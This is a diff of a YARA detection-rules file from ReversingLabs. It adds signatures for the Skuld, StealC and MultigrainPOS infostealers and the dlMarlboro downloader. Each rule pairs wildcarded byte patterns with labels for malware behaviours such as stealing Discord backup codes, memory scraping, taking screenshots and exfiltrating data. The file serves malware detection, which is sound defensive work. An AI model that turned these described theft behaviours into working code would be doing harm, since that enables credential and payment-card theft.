+            89 D9 48 89 CA 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89
+        }
+		$find_files_p3 = {
+            8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4B 8D 34 02 48 89 D9 48 89 C3 48 89 F0 E8
+            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 56 ?? 48 8B 94 24
+            ?? ?? ?? ?? 48 89 56 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? EB ?? E8
+            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 13 4C 8B 46 ?? 4D 89 43 ?? 48 89 56 ?? E9
+            ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 84 24 ?? ?? ?? ?? FF D1 44 0F 11 BC 24
+            ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
+            ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84
+            24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89
+            84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ??
+            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ??
+            ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 48 8B B4 24 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? 4D 89 C1 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ??
+            ?? ?? ?? 48 8B 11 90 48 85 D2 74 ?? 48 39 D1 74 ?? E9 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
+            ?? 74 ?? E8 ?? ?? ?? ?? 49 89 0B 48 8B 11 49 89 53 ?? 48 89 09 48 8B 51 ?? 4C 8B 41
+            ?? 4E 8D 0C 03 4C 8B 51 ?? 4C 39 CA 73 ?? 4C 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48
+            89 84 24 ?? ?? ?? ?? 4C 89 D0 48 89 D1 48 89 DF 48 8D 35 ?? ?? ?? ?? 4C 89 CB E8 ??
+            ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 49 89 C2 49 89 D9 48 89 CA 48 8B 84 24 ?? ?? ?? ??
+            48 8B 5C 24 ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ??
+            ?? 4B 8D 34 02 48 89 D9 48 89 C3 48 89 F0 E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48
+        }
+		$find_files_p4 = {
+            8B B4 24 ?? ?? ?? ?? 48 89 56 ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 56 ?? 83 3D ?? ?? ??
+            ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 49
+            89 13 4C 8B 46 ?? 4D 89 43 ?? 48 89 56 ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ??
+            48 8B 84 24 ?? ?? ?? ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B
+            4C 24 ?? 48 8B 49 ?? 48 8B 84 24 ?? ?? ?? ?? FF D1 48 89 44 24 ?? 44 0F 11 BC 24 ??
+            ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B
+            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89
+            84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 54 24 ?? 0F
+            57 C0 F2 48 0F 2A C2 F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 66 48 0F 7E C0 0F 1F 40 ??
+            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ??
+            41 B8 ?? ?? ?? ?? 4D 89 C1 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 41 ?? 48 89 C2 48 F7 DA 48 8B 59 ??
+            90 48 39 D3 77 ?? 48 81 FB ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 0F 4F D9 48 8D 0D ?? ?? ??
+            ?? 48 0F 4F C1 48 81 C4 ?? ?? ?? ?? 5D C3
+        }
+		$take_screenshot_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ??
+            ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48
+            89 8C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 9C 24 ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8
+            ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? B9 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8D BC
+            24 ?? ?? ?? ?? 48 8D 7F ?? 66 0F 1F 84 00 ?? ?? 00 00 66 0F 1F 44 00 ?? 48 89 6C 24
+            ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48
+            8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
+            05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05
+            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 8C 24 ?? ??
+            ?? ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 48 8B 8C 24 ?? ?? ?? ?? 84 01 83 3D ?? ?? ?? ?? ?? 75
+            ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 49 89 03 48 8B 91 ?? ?? ?? ?? 49 89 53 ?? 48
+        }
+		$take_screenshot_p2 = {
+            8B 54 24 ?? 49 89 53 ?? 48 8B 59 ?? 49 89 5B ?? 48 89 81 ?? ?? ?? ?? 48 8B 5C 24 ??
+            48 89 59 ?? 48 89 51 ?? 48 89 C8 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? E8 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 48 85 FF 75 ?? 31 C9 31 D2 31 F6 EB ?? 31 C0 31 DB 48 89 D9
+            48 81 C4 ?? ?? ?? ?? 5D C3 48 89 04 3E 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B 5C
+            24 ?? 48 FF CB 48 89 D7 48 89 F2 48 89 FE 66 90 48 85 DB 0F 8E ?? ?? ?? ?? 48 89 5C
+            24 ?? 48 89 94 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 08 48 8B
+            50 ?? 48 8D 5E ?? 48 89 5C 24 ?? 48 8B 49 ?? 48 89 D0 FF D1 44 0F 11 BC 24 ?? ?? ??
+            ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ??
+            48 89 94 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24
+            ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48
+            39 D1 72 ?? 48 8B B4 24 ?? ?? ?? ?? EB ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 84 24
+            ?? ?? ?? ?? 48 89 D3 BF ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C6 48
+            89 DA 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8D 7A ?? 48 C1 E7 ?? 48 89 5C 3E ?? 83 3D ??
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 89 03 4C 8B 04 3E 4D 89 43 ?? E9 ??
+            ?? ?? ?? 48 89 D0 48 89 F3 48 81 C4 ?? ?? ?? ?? 5D C3
+        }
+		$get_discord_backup_codes = {
+            48 89 44 24 ?? 48 8D 1D ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4
+            24 ?? ?? ?? ?? 49 89 D8 49 89 C9 31 C0 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ??
+            48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 83 3D ?? ?? ?? ?? ?? 66 90 75 ?? 48 8B 54 24 ?? EB
+            ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 48 8B 58 ?? 49 89 5B ?? 48 89 50 ?? E8 ??
+            ?? ?? ?? 48 89 44 24 ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D 05 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 83 3D ?? ?? ?? ?? ?? 74 ?? 48 8B
+            50 ?? 66 90 E8 ?? ?? ?? ?? 49 89 13 48 8D 15 ?? ?? ?? ?? 48 89 50 ?? 31 C0 48 8D 1D
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 74 24 ?? 49 89 D8 49 89 C9 E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ?? ?? ??
+            ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 10 83 3D ?? ?? ??
+            ?? ?? 75 ?? 48 8B 4C 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 49 89 0B 48 8B 50 ??
+            49 89 53 ?? 48 89 48 ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75
+            ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 48 89 10 BB ?? ?? ??
+            ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ??
+            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 10 83 3D ??
+            ?? ?? ?? ?? 75 ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 4C 8B
+            48 ?? 4D 89 4B ?? 48 89 50 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ?? 31 FF 31
+            F6 49 89 F0 E8 ?? ?? ?? ?? 31 C0 31 DB 48 83 C4 ?? 5D C3
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $get_mac_address ) and ( all of ( $find_files_p* ) ) and ( all of ( $take_screenshot_p* ) ) and ( $get_discord_backup_codes )
+}
+rule REVERSINGLABS_Win32_Infostealer_Stealc : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects StealC infostealer."
+		author = "ReversingLabs"
+		id = "b53bbf15-3e94-513c-91a9-83dda421063b"
+		date = "2023-06-07"
+		modified = "2023-06-07"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/infostealer/Win32.Infostealer.StealC.yara#L1-L57"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "bea1cf370150387eb185deff726e10e660e7eb571c20d22878def08b36f457bf"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "StealC"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$resolve_windows_api = {
+            55 8B EC 51 83 65 ?? ?? 56 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 00 8B 40 ??
+            89 45 ?? 8B 75 ?? 89 35 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35
+        }
+		$load_sqlite3_functions = {
+            55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 50 89 45 ?? 89 4D ?? 8B 4D ?? 8D
+            45 ?? 50 89 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 45 ?? 57 89 45 ?? 8B 7D ??
+            B9 ?? ?? ?? ?? 33 C0 F3 AA 5F 33 C0 C9 C3 8B 45 ?? 85 C0 74 ?? 53 8B 58 ?? 56 8B 70
+            ?? FF 35 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ??
+            A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3
+        }
+		$check_license_expiration_date = {
+            55 8B EC 83 E4 ?? 83 EC ?? 57 33 C0 66 89 44 24 ?? 83 64 24 ?? ?? 8D 7C 24 ?? AB AB
+            AB 66 AB 33 C0 66 89 44 24 ?? 8D 7C 24 ?? AB AB AB 66 AB 33 C0 21 44 24 ?? 8D 7C 24
+            ?? AB 8D 7C 24 ?? AB 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 8D
+            4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ??
+            8B 44 24 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ??
+            8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 3B 44 24 ?? 72 ?? 77 ??
+            8B 44 24 ?? 3B 44 24 ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 8B E5 5D C3
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $resolve_windows_api ) and ( $load_sqlite3_functions ) and ( $check_license_expiration_date )
+}
 rule REVERSINGLABS_Win64_Infostealer_Weaselstore : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
@@ -595,6 +837,90 @@ rule REVERSINGLABS_Win64_Infostealer_Weaselstore : TC_DETECTION MALICIOUS MALWAR
 	condition:
 		uint16( 0 ) == 0x5A4D and ( all of ( $spawn_shell_p* ) ) and ( $gather_chrome_cookies ) and ( all of ( $change_chrome_profile_p* ) ) and ( all of ( $network_communication_p* ) )
 }
+rule REVERSINGLABS_Win32_Infostealer_Multigrainpos : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects MultigrainPOS infostealer."
+		author = "ReversingLabs"
+		id = "595c04af-802f-556d-b22b-23cac79b256e"
+		date = "2020-06-26"
+		modified = "2020-07-15"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/infostealer/Win32.Infostealer.MultigrainPOS.yara#L1-L88"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "9808c95b850a54677c4132057b8372cabf0159920b7e0e6834a83f0d39c088fa"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "MultigrainPOS"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$data_exfiltration_v10_1 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 1D ?? ?? ?? ?? 56 57 8B 3D ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F
+            43 45 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81
+            FE ?? ?? ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 75 ?? 83 7D ?? ?? 5F 5E 5B 72 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 CD B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ??
+            FF 75 ?? FF D7 68 ?? ?? ?? ?? FF D3 EB
+        }
+		$memory_scraping_v10_1 = {
+            6A ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? EB ?? 3C ?? 7C ?? 3C ?? 7E ?? 8A 46 ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 74
+        }
+		$process_search_v10_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 1D ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? 8D
+            85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75
+        }
+		$service_creation_v10_1 = {
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 5E 8B 4C 24 ?? 33 CC E8 ?? ??
+            ?? ?? 8B E5 5D C3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            FF 15
+        }
+		$process_search_v11_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8B 7D ?? FF 15 ??
+            ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 8D 49 ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ??
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF D3 EB ?? 8D 8D
+            ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 66 89
+            85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 EB ?? 8D A4 24 ??
+            ?? ?? ?? EB ?? 8D 49 ?? 0F B7 84 0D ?? ?? ?? ?? 66 89 84 0D ?? ?? ?? ?? 8D 49 ?? 66
+            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+        }
+		$memory_scraping_v11_1 = {
+            6A ?? 56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 6A ??
+            56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8
+        }
+		$data_exfiltration_v11_1 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8A 5D ?? 56 57 8B 3D ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F 43 45 ??
+            6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81 FE ?? ??
+            ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 74 ?? 84 DB 74 ?? 33 F6 83 7D ?? ?? 72 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ??
+            FF 75 ?? FF D7 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 84 DB 74 ?? EB ?? BE ?? ?? ?? ?? EB
+        }
+		$service_creation_v11_1 = {
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 4C 24 ?? 33 CC E8 ?? ?? ??
+            ?? 8B E5 5D C3 8D 44 24 ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( ( $data_exfiltration_v10_1 and $memory_scraping_v10_1 and $process_search_v10_1 and $service_creation_v10_1 ) or ( $process_search_v11_1 and $memory_scraping_v11_1 and $data_exfiltration_v11_1 and $service_creation_v11_1 ) )
+}
 rule REVERSINGLABS_Win64_Infostealer_Daolpu : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
@@ -893,14469 +1219,36537 @@ rule REVERSINGLABS_Win64_Infostealer_Daolpu : TC_DETECTION MALICIOUS MALWARE FIL
 	condition:
 		uint16( 0 ) == 0x5A4D and ( ( $network_communication ) and ( all of ( $find_sensitive_files_p* ) ) and ( all of ( $parse_firefox_configuration_p* ) ) and ( all of ( $collect_browser_passwords_p* ) ) and ( all of ( $collect_cookies_p* ) ) )
 }
-rule REVERSINGLABS_Win64_Infostealer_Skuld : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Downloader_Dlmarlboro : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Skuld infostealer."
+		description = "Yara rule that detects dlMarlboro downloader."
 		author = "ReversingLabs"
-		id = "2658fc6e-3f3f-5042-be05-cdcc3a29f133"
-		date = "2025-06-10"
-		modified = "2025-06-10"
+		id = "4c99b5a4-dc6b-579b-b1bd-bd4c93c6e68c"
+		date = "2020-07-23"
+		modified = "2020-07-23"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/infostealer/Win64.Infostealer.Skuld.yara#L1-L192"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/downloader/Win32.Downloader.dlMarlboro.yara#L1-L79"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a927a8bc74e2a6676825b208cd74f1be09cc3bc3aea7f7d54c5d016a330e77c2"
+		logic_hash = "465a3b3a9686889001ac0b929d0349e44b6015eaeed3386361366def5013164a"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "Skuld"
-		tc_detection_factor = 5
+		tc_detection_type = "Downloader"
+		tc_detection_name = "dlMarlboro"
+		tc_detection_factor = 3
 		importance = 25
 
 	strings:
-		$get_mac_address = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 48 85 FF 75 ?? EB ?? 31 C0 31 DB 48 89 F9 48 89 F7 48 81 C4 ?? ?? ?? ??
-            5D C3 48 83 C0 ?? 48 FF CB 48 85 DB 0F 8E ?? ?? ?? ?? 0F 10 00 0F 11 44 24 ?? 0F 10
-            40 ?? 0F 11 44 24 ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ??
-            ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 0F BA E2 ?? 90 73 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74
-            ?? 31 C9 EB ?? 48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 DB
-            31 C9 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 89 C1 48 8B 84 24 ?? ?? ?? ?? 83 F1 ?? EB ?? 31
-            C9 84 C9 0F 84 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 85 D2 74 ?? 48 89 54 24 ?? 48
-            8D 0C 52 48 8D 49 ?? 48 89 4C 24 ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 74 24 ?? 48
